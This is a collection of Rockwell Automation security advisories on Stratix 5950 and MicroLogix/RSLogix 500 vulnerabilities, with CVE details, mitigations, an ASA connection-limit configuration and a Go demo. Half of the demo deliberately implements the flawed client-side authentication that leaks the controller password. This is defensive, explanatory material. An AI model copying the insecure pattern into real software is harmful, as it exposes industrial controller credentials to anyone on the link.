Stratix 5950 Client Certificate Bypass and Denial of Service Vulnerabilities

Executive Summary

Cisco Systems, Inc. (“Cisco”) has released advisories detailing multiple vulnerabilities in Cisco Adaptive Security Appliance (“ASA”) Software that, if successfully exploited, could allow a threat actor to bypass client certificate authentication and create connections to the affected device, cause an affected device to crash, or view potentially sensitive data on the device. The Allen-Bradley® Stratix® 5950 uses Cisco ASA software as its central operating system; this enables the security device to offer capabilities that include proactive threat defense for industrial control systems.

Customers using affected versions of this product are encouraged to evaluate the mitigations provided below, and apply any appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided below.

Affected Products

Allen-Bradley® Stratix® 5950 Security Appliance
(Cisco Adaptive Security Appliance v9.6.2 and earlier)

  • 1783-SAD4T0SBK9
  • 1783-SAD4T0SPK9
  • 1783-SAD2T2SBK9
  • 1783-SAD2T2SPK9

Vulnerability Details

Vulnerability #1: Flow Creation Denial of Service Vulnerability
A vulnerability in the ingress flow creation functionality of Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to drive CPU utilization to nearly 100 percent, causing a denial of service (DoS) condition on an affected system.

The vulnerability is due to incorrect handling of an internal software lock that could prevent other system processes from getting CPU cycles, causing a high CPU condition. A threat actor could exploit this vulnerability by sending a steady stream of malicious IP packets that can cause connections to be created on the targeted device. A successful exploit could allow the threat actor to exhaust CPU resources, resulting in a DoS condition during which traffic through the device could be delayed. This vulnerability applies to either IPv4 or IPv6 ingress traffic either to or across an affected device.

CVE-2018-0228 has been assigned to this vulnerability. A CVSS v3 base score of 8.6 has been assigned. For a better understanding of how this score was generated, please follow this link with the CVSS v3 vector string: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H.

Vulnerability #2: Virtual Private Network SSL Client Certificate Bypass Vulnerability
A vulnerability in the Secure Sockets Layer (SSL) Virtual Private Network (VPN) Client Certificate Authentication feature for Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote threat actor to establish an SSL VPN connection and bypass certain SSL certificate verification steps.

The vulnerability is due to incorrect verification of the SSL Client Certificate. A threat actor could exploit this vulnerability by connecting to the ASA VPN without a proper private key and certificate pair. A successful exploit could allow the threat actor to establish an SSL VPN connection to the ASA when the connection should have been rejected.

CVE-2018-0227 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been assigned. For a better understanding of how this score was generated, please follow this link with the CVSS v3 vector string: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N.

Vulnerability #3: Transport Layer Security Denial of Service Vulnerability
A vulnerability in the Transport Layer Security (TLS) library of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote threat actor to trigger a reload of the affected device resulting in a denial of service (DoS) condition.

The vulnerability is due to insufficient validation of user-supplied input. A threat actor could exploit this vulnerability by sending a malicious TLS message to an interface enabled for Secure Sockets Layer (SSL) services on an affected device. Messages using SSL Version 3 (SSLv3) or SSL Version 2 (SSLv2) cannot be used to exploit this vulnerability. An exploit could allow the threat actor to cause a buffer underflow, triggering a crash on an affected device.

CVE-2018-0231 has been assigned to this vulnerability. A CVSS v3 base score of 8.6 has been assigned. For a better understanding of how this score was generated, please follow this link with the CVSS v3 vector string: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H.

Vulnerability #4: Application Layer Protocol Inspection Denial of Service Vulnerabilities
Multiple vulnerabilities in the Application Layer Protocol Inspection feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote threat actor to trigger a reload of an affected device, resulting in a denial of service (DoS) condition.

The vulnerabilities are due to logical errors during traffic inspection. A threat actor could exploit these vulnerabilities by sending a high volume of malicious traffic across an affected device. An exploit could allow the threat actor to cause a deadlock condition, resulting in a reload of an affected device.

CVE-2018-0240 has been assigned to this vulnerability. A CVSS v3 base score of 8.6 has been assigned. For a better understanding of how this score was generated, please follow this link with the CVSS v3 vector string: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H.

Vulnerability #5: Web Services Denial of Service or Potential Sensitive Information Disclosure
A vulnerability in the web interface of the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote threat actor to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but a threat actor could view sensitive system information without authentication by using directory traversal techniques.

The vulnerability is due to lack of proper input validation of the HTTP URL. A threat actor could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the threat actor to cause a DoS condition or unauthenticated disclosure of information. This vulnerability applies to IPv4 and IPv6 HTTP traffic.

CVE-2018-0296 has been assigned to this vulnerability. A CVSS v3 base score of 10.0 has been assigned. For a better understanding of how this score was generated, please follow this link with the CVSS v3 vector string: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H.

Risk Mitigation & User Action

Customers using the affected devices are encouraged to update to an available firmware revision that addresses the associated risk and are encouraged when possible, to combine this guidance with the general security guidelines to employ multiple strategies simultaneously.

Update the Stratix 5950 per the table below:

Vulnerability: Suggested Action
#1: Flow Creation Denial of Service Vulnerability
#2: Virtual Private Network SSL Client Certificate Bypass Vulnerability
#3: Transport Layer Security Denial of Service Vulnerability
#4: Application Layer Protocol Inspection Denial of Service Vulnerabilities
#5: Web Services Denial of Service or Potential Sensitive Information Disclosure
Suggested action for all five: Apply FRN v6.4.0 (Download)

Secondary Mitigations include the following:

  • #1: Flow Creation Denial of Service Vulnerability: The ASA and FTD configuration commands, set connection per-client-embryonic-max (TCP) and set connection per-client-max (TCP, UDP, and Stream Control Transmission Protocol {SCTP}), can be configured to limit the number of connection requests allowed. Using these configuration parameters can reduce the number of connections and greatly reduce the impact of the DoS attack.
  • #5 Web Services Denial of Service or Potential Sensitive Information Disclosure: Cisco has released Snort Rule 46897.
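The secondary mitigation for #1 expressed as ASA CLI configuration, as an added example that is not part of the Rockwell or Cisco advisories. The class-map and policy-map names, the interface name `outside`, and the numeric limits are assumptions; size the limits to the number of flows a legitimate host actually opens through the appliance, since a limit set too low is itself a denial of service for that host.

```text
! Added example, not from the advisory. Caps how many connections a single
! client IP may hold through the Stratix 5950 (ASA), reducing the impact of
! the flow-creation DoS (CVE-2018-0228). Names, interface and numbers are
! assumptions.
class-map CONN-LIMIT-ALL
 match any
!
policy-map CONN-LIMIT-POLICY
 class CONN-LIMIT-ALL
  ! per-client-max covers TCP, UDP and SCTP flows per source address;
  ! per-client-embryonic-max caps half-open TCP connections per source.
  set connection per-client-max 100 per-client-embryonic-max 20
!
service-policy CONN-LIMIT-POLICY interface outside
```

After applying it, `show service-policy interface outside` confirms the policy is attached and `show conn count` shows the current connection total, which is the value the limit is meant to keep bounded under a flood. This limits the impact only; the fix for the underlying lock-handling defect is the FRN v6.4.0 update above.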

General Security Guidelines

  1. Help minimize network exposure for all control system devices and/or systems, and confirm that they are not accessible from the Internet.
  2. Locate control system networks and devices behind firewalls and isolate them from the business network.
  3. When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site (https://rok.auto/security)

If you have questions regarding this notice, please send an email to our product security inbox at: secure@ra.rockwell.com.

ADDITIONAL LINKS

  • 54102 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • [ICS-CERT] ICSA-18-184-01 Advisory by ICS-CERT for Rockwell Automation Allen-Bradley Stratix 5950
  • [Cisco Systems Inc.] Cisco Adaptive Security Appliance Flow Creation Denial of Service Vulnerability
  • [Cisco Systems Inc.] Cisco Adaptive Security Appliance VPN SSL Client Certificate Bypass Vulnerability
  • [Cisco Systems Inc.] Cisco Adaptive Security Appliance TLS Denial of Service Vulnerability
  • [Cisco Systems Inc.] Cisco Adaptive Security Appliance Application Layer Protocol Inspection Denial of Service Vulnerability
  • [Cisco Systems Inc.] Cisco Adaptive Security Appliance Web Services Denial of Service Vulnerability
Attachments: KB-1073860_Stratix5950_v1.1.pdf

High
PN1046 | Stratix 5950 Denial of Service Vulnerability
Published Date:
April 07, 2020
Last Updated:
April 07, 2020
CVE IDs:
CVE-2018-0472
Products:
Stratix 5950 Security Appliance
CVSS Scores:
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.0 - April 04, 2019. Initial Release.
Version 1.1 - April 7, 2020. Updates to mitigations.

Stratix 5950 Denial of Service Vulnerability

Executive Summary

Cisco® released its semi-annual Cisco IOS and IOS XE Software Security Advisory Bundled Publication, which included seven security advisories that affect Allen-Bradley® products. One of these vulnerabilities affects the following Allen-Bradley Stratix® product:

  • Allen-Bradley Stratix 5950 Security Appliance

Affected Products

Allen-Bradley Stratix 5950 Security Appliance

  • 1783-SAD4T0SBK9
  • 1783-SAD4T0SPK9
  • 1783-SAD2T2SBK9
  • 1783-SAD2T2SPK9

Vulnerability Details

Cisco Adaptive Security Appliance (ASA) IPsec Denial of Service

A vulnerability in the IPsec driver code of multiple Cisco IOS XE Software platforms and the Cisco ASA 5500-X Series Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause the device to reload.

The vulnerability is due to improper processing of malformed IPsec Authentication Header (AH) or Encapsulating Security Payload (ESP) packets. An attacker could exploit this vulnerability by sending malformed IPsec packets to be processed by an affected device. An exploit could allow the attacker to cause a reload of the affected device.

NOTE: IPsec is disabled by default in the Allen-Bradley Stratix 5950 devices.

The security disclosure from Cisco for their IOS XE and Cisco ASA 5500-x Series is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180926-ipsec.

CVE-2018-0472 has been assigned to this vulnerability. A CVSS v3 base score of 8.6 has been assigned. For a better understanding of how this score was generated, please follow this link with the CVSS v3 vector string: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H.

Risk Mitigation & User Action

Customers using the affected devices are encouraged to update to an available firmware revision that addresses the associated risk and are encouraged when possible, to combine this guidance with the general security guidelines to employ multiple strategies simultaneously.

Update the affected products per the table below:

Product: Suggested Action

Stratix 5950 Security Appliance
  • 1783-SAD4T0SBK9
  • 1783-SAD4T0SPK9
  • 1783-SAD2T2SBK9
  • 1783-SAD2T2SPK9
Suggested action: Apply FRN v6.4.0 (Download)

General Security Guidelines

  1. Utilize proper network infrastructure controls, such as firewalls, to help ensure that requests from unauthorized sources are blocked and the controls are isolated from the business network.
  2. Consult the product documentation for specific features, such as access control lists and deep packet inspection, which may be used to block unauthorized changes.
  3. Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation® products, see Knowledgebase Article ID 898270.
  4. Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com). Please direct all media inquiries to Keith Lester (klester@ra.rockwell.com).

ADDITIONAL LINKS

  • 54102 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide

Medium
PN1100 | PN1100 | Stratix 5950 Secure Boot Hardware Tampering Vulnerability
Published Date:
March 10, 2020
Last Updated:
March 10, 2020
CVE IDs:
CVE-2019-1649
Products:
Stratix 5950 Security Appliance
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
Revision 1.0
Revision History
March 10, 2020.  Initial Release.

Executive Summary

Cisco Systems, Inc. (Cisco) released an advisory regarding a vulnerability in the logic that handles access control to a hardware component in Cisco’s proprietary Secure Boot implementation. If successfully exploited, an attacker could write a modified firmware image to the component. The Allen-Bradley® Stratix® 5950 utilizes Cisco’s proprietary Secure Boot implementation.

Customers using affected versions of this product are encouraged to evaluate the mitigations provided below and apply any appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided below.

Affected Products

Allen-Bradley Stratix 5950 Security Appliance:

  • 1783-SAD4T0SBK9
  • 1783-SAD4T0SPK9
  • 1783-SAD2T2SBK9
  • 1783-SAD2T2SPK9

Vulnerability Details

CVE-2019-1649: Cisco Secure Boot Hardware Tampering
A vulnerability in the logic that handles access control to one of the hardware components in Cisco's proprietary Secure Boot implementation could allow an authenticated, local attacker to write their own modified firmware image to the affected component.

The vulnerability is due to an improper check on the area of code that manages on-premise updates to a Field Programmable Gate Array (FPGA) part of the Secure Boot hardware implementation. An attacker with elevated privileges and access to the underlying operating system running on the affected device could utilize this vulnerability to write a modified firmware image to the FPGA. A successful exploit could cause the device to become unusable (and require a hardware replacement) or allow tampering with the Secure Boot verification process, which under some circumstances may allow the attacker to install and boot a malicious software image.

The security disclosure from Cisco regarding their Secure Boot implementation is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190513-secureboot.

CVSS v3.1 Base Score: 6.7/10 [MEDIUM]
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected devices are encouraged to update to an available firmware revision that addresses the associated risk and, when possible, to combine this guidance with the general security guidelines below so that multiple strategies are employed simultaneously.

Update the affected products per the table below:

Vulnerability: CVE-2019-1649
Product: Stratix 5950 Security Appliance
  • 1783-SAD4T0SBK9
  • 1783-SAD4T0SPK9
  • 1783-SAD2T2SBK9
  • 1783-SAD2T2SPK9
Suggested action: Apply FRN v6.4.0 (Download)

General Security Guidelines

  1. Utilize proper network infrastructure controls, such as firewalls, to help ensure that requests from unauthorized sources are blocked and the controls are isolated from the business network.
  2. Consult the product documentation for specific features, such as access control lists and deep packet inspection, which may be used to block unauthorized changes.
  3. Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation® products, see Knowledgebase Article ID 898270.
  4. Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (KAByrd@ra.rockwell.com).

Additional Links

  • 54102 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • Cisco Secure Boot Hardware Tampering Vulnerability

Critical
PN1411 | PN1411 | MicroLogix Controllers, RSLogix 500 Software Contains Multiple Vulnerabilities Affecting Confidentiality
Published Date:
March 05, 2020
Last Updated:
March 05, 2020
CVE IDs:
CVE-2020-6980, CVE-2020-6990, CVE-2020-6988, CVE-2020-6984
Products:
RSLogix 500
CVSS Scores:
4.0, 5.9, 9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
Version 1.0
Revision History
March 05, 2020 - Initial release.

Executive Summary

A subset of MicroLogix™ controllers and RSLogix 500® software contain multiple vulnerabilities that could allow an attacker to gain access to sensitive project file information including passwords. Ilya Karpov, Evgeny Druzhinin from independent research team ScadaX Security and Dmitry Sklyarov from Positive Technologies submitted reports to Rockwell Automation regarding several vulnerabilities found in the Allen-Bradley® MicroLogix controllers and RSLogix 500 software. A subset of these vulnerabilities was also independently co-discovered and reported by Rongkuan Ma, Xin Che, and Peng Cheng from 307 Lab.

Customers using affected versions of these products are encouraged to evaluate their risk and apply the appropriate mitigations provided below to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

MicroLogix 1400 Controllers
Series B, v21.001 and earlier
Series A, all versions

MicroLogix 1100 Controllers
All versions

RSLogix 500® Software
V12.001 and earlier

Vulnerability Details

CVE-2020-6990: Use of Hard-Coded Cryptographic Key
The cryptographic key used to help protect the account password is hard-coded into the RSLogix 500 binary. An attacker who extracts this key could use it in further cryptographic attacks that ultimately allow a remote attacker to gain unauthorized access to the controller.

CVSS v3.1 Base Score: 9.8/CRITICAL
CVSS v3.1 Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.

CVE-2020-6984: Use of a Broken or Risky Algorithm for Password Protection
The cryptographic function utilized to protect the password in MicroLogix is discoverable. This password protects access to the device. If successfully exploited a remote attacker could gain unauthorized access to the controller.

CVSS v3.1 Base Score: 9.8/CRITICAL
CVSS v3.1 Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2020-6988: Use of Client-Side Authentication
A remote, unauthenticated attacker can send the request that RSLogix 500 software normally sends to the victim’s MicroLogix controller, and the controller responds with the stored password values so that the user is authenticated on the client side. Because the controller trusts the client’s decision, this method of authentication may allow an attacker to bypass authentication altogether, disclose sensitive information, or leak credentials.

CVSS v3.1 Base Score: 5.9/MEDIUM
CVSS v3.1 Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N. Note that this vector string as published evaluates to 7.5 under the CVSS v3 formula; a base score of 5.9 corresponds to AC:H rather than AC:L, so confirm the intended vector before using it to prioritize.

CVE-2020-6980: Unsecured SMTP Data Storage
If Simple Mail Transfer Protocol (SMTP) account data is saved in RSLogix 500, a local attacker with access to a victim’s project file or the controller, may be able to gather SMTP server authentication data as it is written to the project file in cleartext.

CVSS v3.1 Base Score: 4.0/MEDIUM
CVSS v3.1 Vector String: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N.
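
The design fault behind CVE-2020-6988, as an added example that is not Rockwell’s code and not the MicroLogix or RSLogix 500 protocol: a model in which the controller hands the stored password values to the client and lets the client decide, next to a controller-side challenge/response in which only a keyed MAC of a fresh, single-use nonce crosses the link. The same failure mode, a password recoverable by anyone on the communication link, is what PN560 further down this page describes for the older MicroLogix password mechanism. The password, the 16-byte nonce and the HMAC-SHA256 construction are assumptions for the example.

```go
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"crypto/subtle"
	"encoding/hex"
	"errors"
	"fmt"
)

// Controller models the device side. The stored secret is the same in both
// designs; what differs is whether it ever crosses the link.
type Controller struct {
	secret []byte
	issued map[string]bool // outstanding challenge nonces (hardened design only)
}

func NewController(secret []byte) *Controller {
	return &Controller{secret: append([]byte(nil), secret...), issued: map[string]bool{}}
}

// ---- Weak design: client-side authentication ----

// ReadPasswordValues is the request/response the vulnerable flow relies on:
// the controller returns the stored password material to whoever asks.
func (c *Controller) ReadPasswordValues() []byte {
	return append([]byte(nil), c.secret...)
}

// WeakClientLogin performs the comparison on the client. The controller cannot
// tell whether it ran, and the reply itself is the credential.
func WeakClientLogin(c *Controller, entered []byte) bool {
	return subtle.ConstantTimeCompare(c.ReadPasswordValues(), entered) == 1
}

// Eavesdrop models an attacker on the link (or one who simply sends the
// request): the password is recovered from the response without guessing.
func Eavesdrop(c *Controller) []byte {
	return c.ReadPasswordValues()
}

// ---- Hardened design: controller-side challenge/response ----

var ErrAuthFailed = errors.New("authentication failed")

// Challenge issues a fresh random nonce and remembers it so it can be used once.
func (c *Controller) Challenge() ([]byte, error) {
	nonce := make([]byte, 16)
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	c.issued[hex.EncodeToString(nonce)] = true
	return nonce, nil
}

// Respond is computed by the client from the password it holds and the nonce.
// Only a keyed MAC of the nonce crosses the link, never the password itself.
// (A key derived from the password with a KDF would be preferable to the raw
// password; the raw password is used here to keep the example short.)
func Respond(password, nonce []byte) []byte {
	m := hmac.New(sha256.New, password)
	m.Write(nonce)
	return m.Sum(nil)
}

// Verify is the controller's decision: the nonce must be one it issued and not
// yet consumed, and the response must match its own computation.
func (c *Controller) Verify(nonce, response []byte) error {
	key := hex.EncodeToString(nonce)
	if !c.issued[key] {
		return fmt.Errorf("%w: unknown or reused nonce", ErrAuthFailed)
	}
	delete(c.issued, key) // one use only, so a captured response cannot be replayed
	if !hmac.Equal(Respond(c.secret, nonce), response) {
		return fmt.Errorf("%w: bad response", ErrAuthFailed)
	}
	return nil
}

// Demo runs both flows against a constructed password and reports what an
// attacker on the link gets out of each.
func Demo() (weakLeaks, goodLoginOK, badLoginRejected, replayRejected bool, err error) {
	const password = "constructed-demo-password" // constructed for the example
	ctl := NewController([]byte(password))

	// Weak: the eavesdropper learns the password outright.
	weakLeaks = string(Eavesdrop(ctl)) == password && WeakClientLogin(ctl, []byte(password))

	// Hardened: legitimate login.
	nonce, err := ctl.Challenge()
	if err != nil {
		return
	}
	resp := Respond([]byte(password), nonce)
	goodLoginOK = ctl.Verify(nonce, resp) == nil

	// Hardened: replaying the captured (nonce, response) pair fails.
	replayRejected = errors.Is(ctl.Verify(nonce, resp), ErrAuthFailed)

	// Hardened: a wrong password against a fresh challenge fails.
	nonce2, err := ctl.Challenge()
	if err != nil {
		return
	}
	badLoginRejected = errors.Is(ctl.Verify(nonce2, Respond([]byte("wrong"), nonce2)), ErrAuthFailed)
	return
}

func main() {
	fmt.Println(Demo())
}
```

The point to take from the weak half is that no amount of client-side hardening helps: the secret is already in the reply. The hardened half moves the decision onto the device and makes each response bound to a nonce the device issued and will accept only once.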

Acknowledgements:

CVE# Discovery Attribution
CVE-2020-6990 Originally reported by Ilya Karpov, Evgeny Druzhinin from independent research team ScadaX Security and Dmitry Sklyarov from Positive Technologies.
CVE-2020-6984 Originally reported by Ilya Karpov, Evgeny Druzhinin from independent research team ScadaX Security and Dmitry Sklyarov from Positive Technologies. Independently co-discovered by Rongkuan Ma, Xin Che, and Peng Cheng from 307 Lab.
CVE-2020-6988 Originally reported by Ilya Karpov, Evgeny Druzhinin from independent research team ScadaX Security and Dmitry Sklyarov from Positive Technologies. Independently co-discovered by Rongkuan Ma, Xin Che, and Peng Cheng from 307 Lab.
CVE-2020-6980 Originally reported by Ilya Karpov, Evgeny Druzhinin from independent research team ScadaX Security and Dmitry Sklyarov from Positive Technologies.

Risk Mitigation & User Action

Customers are encouraged to assess their level of risk regarding their specific applications and update to the latest available firmware or software version that addresses the associated risk. Customers who are unable to update are directed to the risk mitigation strategies provided below and are encouraged, when possible, to combine these strategies with the general security guidelines to employ multiple strategies simultaneously.

Note: Customers using affected versions of MicroLogix 1400 or MicroLogix 1100 are urged to contact their local distributor or sales office to upgrade their devices to MicroLogix 1400 Series B or a newer product line.

Product: MicroLogix 1400 controllers, Series B
Catalog numbers: 1766-L32AWA, 1766-L32AWAA, 1766-L32BWA, 1766-L32BWAA, 1766-L32BXB, 1766-L32BXBA
Suggested action for CVE-2020-6990, CVE-2020-6984 and CVE-2020-6988: Apply FRN 21.002 or later for MicroLogix 1400 Series B devices (Download). Use the Enhanced Password Security feature.
Suggested action for CVE-2020-6980: Apply FRN 21.002 or later for MicroLogix 1400 Series B devices (Download). Use the Enhanced Password Security feature.

Product: MicroLogix 1400 controllers, Series A
Catalog numbers: 1766-L32AWA, 1766-L32AWAA, 1766-L32BWA, 1766-L32BWAA, 1766-L32BXB, 1766-L32BXBA
Suggested action for CVE-2020-6990, CVE-2020-6984 and CVE-2020-6988: No direct mitigation.
Suggested action for CVE-2020-6980: No direct mitigation.

Product: MicroLogix 1100 controllers
Catalog numbers: 1763-L16BWA, 1763-L16AWA, 1763-L16BBB, 1763-L16DWD
Suggested action for CVE-2020-6990, CVE-2020-6984 and CVE-2020-6988: No direct mitigation.
Suggested action for CVE-2020-6980: No direct mitigation.

Product: RSLogix 500® software
Catalog numbers: R324-RL0x
Suggested action for CVE-2020-6990, CVE-2020-6984 and CVE-2020-6988: Apply version V11 or later (Download), used in conjunction with FRN 21.002 or later on MicroLogix 1400 Series B devices. Use the Enhanced Password Security feature. Other configurations: no direct mitigation.
Suggested action for CVE-2020-6980: No direct mitigation.

General Security Guidelines

  1. Use trusted software, software patches, anti-virus/anti-malware programs and interact only with trusted websites and attachments.
  2. Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet.
  3. Locate control system networks and devices behind firewalls and isolate them from the business network.
  4. When remote access is required, use secure methods, such as virtual private networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. VPN is only as secure as the connected devices.
  5. Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
  6. Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  7. Use of the Microsoft® AppLocker application or another similar whitelisting application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID 546989.
  8. Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.

For further information on the Vulnerability Handling Process for Rockwell Automation, please see our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (kabyrd@ra.rockwell.com).

Additional Links:

  • 54102 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide

PN359 | PN359 | Firmware Upgrade Security Notice: Comment on DHS Communication (Control Systems Vulnerability in Multiple Sectors)
Published Date:
February 11, 2020
Last Updated:
February 11, 2020
Products:
1756-L72, L73, L74, L75, 1789 SoftLogix PC
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Introduction

Firmware Upgrade Security Notice: Comment on DHS Communication (Control Systems Vulnerability in Multiple Sectors)

Description

Rockwell Automation recognizes the importance of information and control system security to our customers. We are committed to working with government agencies and standards development organizations to develop solutions targeted to help our customers improve their overall system security strategy.

As part of this effort, the Idaho National Laboratory (INL) Control Systems Security Program, under contract to the Department of Homeland Security (DHS), identified a potential security concern within the firmware upgrade process used in control systems deployed in Critical Infrastructure and Key Resources (CIKR). DHS has confirmed that the firmware upgrade process can be intentionally manipulated in a manner that has potential to render the device inoperable and cause a disruption to the process and/or system operation.

Rockwell Automation has been working in partnership with DHS to identify potential short-term and long-term mitigation strategies.

As a result, Rockwell Automation is implementing a policy to digitally sign most firmware images and require contemporary devices to validate this signature before applying a firmware upgrade. Over time, many contemporary Rockwell Automation products will include this signature validation mechanism to help ensure firmware integrity and authenticity.

The following Rockwell Automation products currently authenticate firmware using digital signatures:

  • ControlLogix 1756-L72, L73, L74, L75 Programmable Automation Controllers
  • Virtual firmware of the 1789 SoftLogix PC based controllers

For other devices, to help reduce the likelihood of the upgrade process being exploited and help reduce associated security risk, Rockwell Automation and DHS recommend the following short-term mitigation strategies (Note: multiple strategies can be employed simultaneously):

  1. Disable where possible the capability to perform remote firmware upgrades over a network to a controller by placing the controller key switch into RUN mode. This prevents the Allen-Bradley brand controllers from accepting firmware upgrades.
  2. Restrict physical and electronic access to automation networks and systems to only those individuals authorized to be in contact with control system equipment and perform product firmware upgrades to that equipment.
  3. Restrict firmware upgrades to the local ControlNetwork or direct (point-to-point) physical methods only by physically or electronically isolating target devices from any larger system while performing a firmware upgrade.
  4. Temporarily remove unnecessary network connections to the device before administering a firmware upgrade. Reactivate device-specific security measures and replace network connections only after a successful firmware upgrade.
